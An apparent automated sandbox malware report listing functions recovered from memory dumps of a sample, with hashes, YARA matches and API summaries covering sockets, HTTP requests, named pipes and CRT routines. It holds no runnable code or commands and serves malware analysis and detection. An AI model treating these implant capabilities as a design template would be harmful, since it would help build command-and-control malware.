                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free
                • String ID:
                • API String ID: 1294909896-0
                • Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                • Instruction ID: d57bf8e47affcda77c628be205ea94685852170c192f6ea003444fb5114afa0b
                • Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                • Instruction Fuzzy Hash: 1ED1197B704B4292DF20DF65D8902AE6761FBE6798F900012EF4E97658EF34C986C740
                Function 00669D6C Relevance: .4, Instructions: 367COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free
                • String ID:
                • API String ID: 1294909896-0
                • Opcode ID: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                • Instruction ID: a68336142a694b4ea7778f662b1399bda95fa39f36c900c5556e207a4f108332
                • Opcode Fuzzy Hash: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                • Instruction Fuzzy Hash: 6ED1D572304A4292DF20DBA5D4902EEA766F794798F900116EF4E97718EF36CE46CB40
                Function 001B0334 Relevance: .2, Instructions: 163COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                • Instruction ID: 84848dc8c9b8eb3aba007217a0bbcd6b803f8d12ccf809fb5b860898a47fbc9a
                • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                • Instruction Fuzzy Hash: 37617B32714B40D6EB249F62E88439E73E1F79CB94F11512AEA4E83B24DF79C995CB40
                Function 0068CF97 Relevance: .1, Instructions: 134COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                • Instruction ID: 7bf834dff18ef2d97432191af032f825d37cd7e6b1fb4cc17482811a90c83697
                • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                • Instruction Fuzzy Hash: D1510CB6214A508BD754CB0DE4A072AB7E2F3CCBD4F84521AE38B87B68DA3DD555CB40
                Function 00692020 Relevance: .0, Instructions: 37COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                • Instruction ID: c18a84c296884c2148f3584f8dcdcb74ce16d9512609834e75fb3b08a9be0ab6
                • Opcode Fuzzy Hash: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                • Instruction Fuzzy Hash: 9EF0FFD7E1DAE26ADB2346640C7D1982F57A4B2A2134DC14F8B8053F93A4060C01D312
                Function 004542E4 Relevance: .0, Instructions: 13COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                • Instruction ID: 6df1996fe5ab077fac6f5f648561be467765c73faf68bb16cd4171b126be2ea7
                • Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                • Instruction Fuzzy Hash: 60D0C7C7F5DFD096D32281A40C6A0692F91B5F291535E818FAE4497397B40C1D4D5315
                Function 00692630 Relevance: .0, Instructions: 13COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                • Instruction ID: 539d35eff73e93ac76602df4a068df1f8cc5d4c668e64a5cd509f388140b9171
                • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                • Instruction Fuzzy Hash: 44D05EFBE1DBD21BEB6382284C3D2882F66A162A2074C408F878007FA3E44A1801C311
                Function 00692050 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                • Instruction ID: c624cead7d371148b89316b008a246588d0c5e32bc8caaeb701ddc815d516811
                • Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                • Instruction Fuzzy Hash: B1C04C57A14AD1579B125A15087A5942B57E5D3D3238A82998D5183E47900A5C17E311
                Function 006924F0 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                • Instruction ID: 8009e9f2c8603c0aa392f075b10aaf32735fc7346bb9e3a3e5ffbe436e7b62eb
                • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                • Instruction Fuzzy Hash: 60C012DBE1DEC15AE72342544C7509F3ED694F2D1030F4046CF4402753A1460C106251
                Function 00402F62 Relevance: .0, Instructions: 6COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                • Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
                • Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                • Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C
                Function 00692078 Relevance: .0, Instructions: 2COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                • Instruction ID: e1caecb6445a2499f8d0cd7f9dcdff8d8002f52e01be10325dabbee32111e1e2
                • Opcode Fuzzy Hash: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                • Instruction Fuzzy Hash: 8390025650E3C009CA03D6241C601083F60B08290038B408B838042BC3D44C0508C322
                Function 00676BE0 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: acceptioctlsocket$closesockethtonlselect
                • String ID:
                • API String ID: 2003300010-0
                • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                • Instruction ID: 3a22ab2671ea9756bc4af0d6e732f6acd978155fc56be1d3b0b411975531676c
                • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                • Instruction Fuzzy Hash: 2D919932710A919BDB60DF21E9507AD33A6F788B98F008229EB4E47F58DF35C665CB10
                Function 0066EC04 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165networksleepCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                • String ID: %s%s$*/*
                • API String ID: 3787158362-856325523
                • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                • Instruction ID: 4feb4164774b2fa1ebca02c0a566f91f923d055f021e5dab81b1decc33edf96a
                • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                • Instruction Fuzzy Hash: DC711236300B859AEB50DF65E8903ED37A2FB88788F504126EA4D13B68DF3EC51AC710
                Function 006753E4 Relevance: 18.1, APIs: 12, Instructions: 105pipesleepfileCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                • String ID:
                • API String ID: 34948862-0
                • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                • Instruction ID: 6e884b6e5ffd85282d21a74658fbec779b271abfe7c071b39529fe0f93f4ef17
                • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                • Instruction Fuzzy Hash: B541AB32704F01D6EB00DB61E8647AD336BE388BA4F908225DE2F47BA4DF79C4668740
                Function 0067FE10 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 0067FE36
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • _invalid_parameter_noinfo.LIBCMT ref: 0067FE42
                • __crtIsPackagedApp.LIBCMT ref: 0067FE53
                • AreFileApisANSI.KERNEL32 ref: 0067FE62
                • MultiByteToWideChar.KERNEL32 ref: 0067FE88
                • GetLastError.KERNEL32 ref: 0067FE95
                • _dosmaperr.LIBCMT ref: 0067FE9D
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1138158220-0
                • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                • Instruction ID: cf4228a557fd0e6063c7d3efb5bddca3d5e4dcbb782ebe834ceeb27299a869a2
                • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                • Instruction Fuzzy Hash: 2121C132300B4192EB50AF76E81472D77E7AB89FA4F148638EE4947BA6EF3CC5118705
                Function 0067FF6C Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                • String ID:
                • API String ID: 4099253644-0
                • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                • Instruction ID: f1ad4a06997b4ec404ae2e7d0c08ef39ca67135b9a45530cf5c6cb660311c64c
                • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                • Instruction Fuzzy Hash: 81316D25301A4085FE44FF51E8607B423A3BB46B90F084629DD5E177A2DF7EC964CB06
                Function 00677308 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                • String ID: d
                • API String ID: 1257931466-2564639436
                • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                • Instruction ID: e4ac90b84feb32bba891d0a522a0d5fa65501591bdec2923f5d6bc6cc3296ff1
                • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                • Instruction Fuzzy Hash: 90319C32214B81D6DB20CF62F88479A77A6F788B98F005126EE8D47F28DF79C565CB40
                Function 001C1B48 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 227COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: write_multi_char$write_string$free
                • String ID:
                • API String ID: 2630409672-3916222277
                • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                • Instruction ID: 93fad225b0fb5ed7e81c76d3e0d515d3c62d7566275eba2a4f6cc3feda05745d
                • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                • Instruction Fuzzy Hash: 1591133374878496EB25CB65E404BAE7B70F7A6794F24100EEF8A57B99DB38C945CB00
                Function 006771FC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$ErrorLastSleepselectsend
                • String ID: d
                • API String ID: 2152284305-2564639436
                • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                • Instruction ID: efd5a79e5ba5b1a49d4fa8f9e830f0533f845b3e87a0d99194b745c716581666
                • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                • Instruction Fuzzy Hash: 9E219032218A8196D7609F21F88838E7366F784784F504225EBAD47F59DF39C5A4CB44
                Function 0066FB08 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                • String ID:
                • API String ID: 3101085627-0
                • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                • Instruction ID: 20c444c17b0549a3d1c7f0f45b5fa1bf5f6f455f3e7158127a932f33e358a413
                • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                • Instruction Fuzzy Hash: A7318E32700A45AAEB10DFB9E49439D3377F784B98F514126EE0E97A29DF39C549C780
                Function 001C621C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 001C624E
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C6245
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                • __doserrno.LIBCMT ref: 001C62AB
                • _errno.LIBCMT ref: 001C62B2
                • _invalid_parameter_noinfo.LIBCMT ref: 001C6316
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 388111225-0
                • Opcode ID: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                • Instruction ID: 38d4aac9496663a0b74bc99d89ee2c492c4ed760ec678c284055fd81f10a89bb
                • Opcode Fuzzy Hash: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                • Instruction Fuzzy Hash: B8210632710394D6C7066FB59C92F2D3620BBB2BA0F95922DEE2517793CB78C892C710
                Function 00686E1C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 00686E4E
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 00686E45
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                • __doserrno.LIBCMT ref: 00686EAB
                • _errno.LIBCMT ref: 00686EB2
                • _invalid_parameter_noinfo.LIBCMT ref: 00686F16
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 388111225-0
                • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                • Instruction ID: 7cfaa5dcb511f5f5a62132100b7c36c6074cf6fcc5c00208eaf73f742b1eeb31
                • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                • Instruction Fuzzy Hash: AE21F17231035086C757BF76E89132D3657AB82BA0F958329FE212B792CB7CC8428715
                Function 001CF150 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 001CF176
                • _errno.LIBCMT ref: 001CF16B
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1812809483-0
                • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                • Instruction ID: 07de931665cf7b0ae0fbed8da54a5f8435d64601eeafdbe7b98d6462026b7dde
                • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                • Instruction Fuzzy Hash: 0341447A610395C2DF24AB62C401BAD72A2E775BE4FA8423EEB9443B85D738C943C700
                Function 0068FD50 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 0068FD76
                • _errno.LIBCMT ref: 0068FD6B
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1812809483-0
                • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                • Instruction ID: 4d6e19287958bf355a1f7852a4977f97c7be83c3748a9460f70b2f05641afc63
                • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                • Instruction Fuzzy Hash: 0841477261039186DF20FB2294442FD77A3EB65BE4FA44336EB9447BA6D739C8928700
                Function 0068027C Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00680264: _mtinitlocknum.LIBCMT ref: 00683DAA
                  • Part of subcall function 00680264: _amsg_exit.LIBCMT ref: 00683DB6
                • DecodePointer.KERNEL32 ref: 006802D8
                • DecodePointer.KERNEL32 ref: 006802F6
                • EncodePointer.KERNEL32 ref: 00680324
                • DecodePointer.KERNEL32 ref: 00680339
                • EncodePointer.KERNEL32 ref: 00680344
                • DecodePointer.KERNEL32 ref: 00680356
                • DecodePointer.KERNEL32 ref: 00680366
                • __crtCorExitProcess.LIBCMT ref: 006803EA
                • ExitProcess.KERNEL32 ref: 006803F2
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                • String ID:
                • API String ID: 1550138920-0
                • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                • Instruction ID: 9df82419cd52bf638c99b27bdb88a8babd163be2b3f9864eb32f8bca7f94e206
                • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                • Instruction Fuzzy Hash: D7418031216B5297F690AF11FC5431973A7F788BD4F440629E98E93B24DF39C5A98700
                Function 00676500 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                • String ID:
                • API String ID: 3339321253-0
                • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                • Instruction ID: b1788b8707f78e1acc7366027eacb695295fd0740c809ae3d58e72257b77e0e2
                • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                • Instruction Fuzzy Hash: 97316922314A91A2EB24DF21E8647AE6367F744BA8F544134EE0E47B98EF3DC659C740
                Function 00676B98 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00676BE0: htonl.WS2_32 ref: 00676C3D
                  • Part of subcall function 00676BE0: select.WS2_32 ref: 00676CAB
                  • Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676CC3
                  • Part of subcall function 00676BE0: accept.WS2_32 ref: 00676CE0
                  • Part of subcall function 00676BE0: ioctlsocket.WS2_32 ref: 00676CF8
                  • Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676D9B
                • GetTickCount.KERNEL32 ref: 00676BAA
                  • Part of subcall function 00676F2C: malloc.LIBCMT ref: 00676F5E
                  • Part of subcall function 00676F2C: htonl.WS2_32 ref: 00676F91
                  • Part of subcall function 00676F2C: recvfrom.WS2_32 ref: 00676FD5
                  • Part of subcall function 00676F2C: WSAGetLastError.WS2_32 ref: 00676FE2
                • GetTickCount.KERNEL32 ref: 00676BC2
                • GetTickCount.KERNEL32 ref: 006770E0
                • GetTickCount.KERNEL32 ref: 006770F6
                • shutdown.WS2_32 ref: 00677115
                • shutdown.WS2_32 ref: 0067712A
                • closesocket.WS2_32 ref: 00677134
                • free.LIBCMT ref: 00677154
                • free.LIBCMT ref: 00677169
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                • String ID:
                • API String ID: 3610715900-0
                • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                • Instruction ID: d8f480d3902b15dbd3bfb10997250aad907e18a79d7c5dc3265a71454a942d6c
                • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                • Instruction Fuzzy Hash: F2218D72204A42C2DB209F72E85436923A7F748F88F18C225DE4D87725DF75C9A1CB56
                Function 001C7008 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 001C7033
